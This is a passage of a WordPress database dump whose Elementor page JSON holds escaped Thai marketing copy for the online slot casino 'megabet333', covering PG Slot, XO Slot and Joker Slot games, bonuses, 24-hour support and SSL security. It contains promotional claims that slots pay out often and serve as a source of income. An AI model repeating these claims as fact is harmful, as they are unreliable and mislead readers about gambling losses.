\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e21\\u0e34\\u0e19\\u0e34\\u0e21\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e46 \\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32 pg Slot \\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e15\\u0e34\\u0e14\\u0e43\\u0e08\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>XO Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e15\\u0e33\\u0e19\\u0e32\\u0e19\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e23\\u0e38\\u0e48\\u0e19\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e22\\u0e31\\u0e07\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e02\\u0e32\\u0e14\\u0e1b\\u0e32\\u0e01\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d XO Slot \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e07\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e32\\u0e19\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e14\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e16\\u0e49\\u0e27\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e02\\u0e2d\\u0e07 XO Slot \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e17\\u0e35\\u0e48\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e08\\u0e19\\u0e16\\u0e39\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32 \\u201c\\u0e04\\u0e48\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e0a\\u0e04\\u201d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 Roma, Supreme Caishen \\u0e2b\\u0e23\\u0e37\\u0e2d Lucky Panda \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e25\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e15\\u0e49\\u0e2d\\u0e07 XO Slot \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>Joker Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e15\\u0e01\\u0e41\\u0e23\\u0e07 \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e38\\u0e01\\u0e41\\u0e19\\u0e27 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d Joker Gaming \\u0e17\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e04\\u0e27\\u0e49\\u0e32\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e0a\\u0e48\\u0e19 Roma X, Queen 2, \\u0e41\\u0e25\\u0e30 Joker Madness \\u0e25\\u0e49\\u0e27\\u0e19\\u0e21\\u0e35\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e15\\u0e49\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e20\\u0e32\\u0e29\\u0e32\\u0e44\\u0e17\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07\\u0e14\\u0e38\\u0e14\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e04\\u0e27\\u0e23\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Character_slot_3_-_Megabet333-Biz.webp\",\"id\":52,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 megabet333 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e48\\u0e22\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 24 \\u0e0a\\u0e21. \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e01\\u0e32\\u0e23\\u0e41\\u0e01\\u0e49\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e01\\u0e35\\u0e48\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21 \\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14 \\u0e44\\u0e25\\u0e19\\u0e4c \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 SSL Encryption \\u0e17\\u0e35\\u0e48\\u0e40\\u0e17\\u0e35\\u0e22\\u0e1a\\u0e40\\u0e17\\u0e48\\u0e32\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e16\\u0e39\\u0e01\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e08\\u0e32\\u0e01\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e21\\u0e15\\u0e35\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e48\\u0e27\\u0e44\\u0e2b\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25 100% \\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e22\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e01\\u0e25\\u0e32\\u0e07\\u0e27\\u0e31\\u0e19\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e25\\u0e32\\u0e07\\u0e04\\u0e37\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e1e\\u0e31\\u0e01\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e32\\u0e1a\\u0e23\\u0e37\\u0e48\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1183,147,'_thumbnail_id','60'),(1184,147,'_elementor_edit_mode','builder'),(1185,147,'_elementor_template_type','wp-page'),(1186,147,'_elementor_version','3.32.5'),(1187,147,'_elementor_pro_version','3.32.3'),(1188,147,'_wp_page_template','default'),(1189,147,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1190,147,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 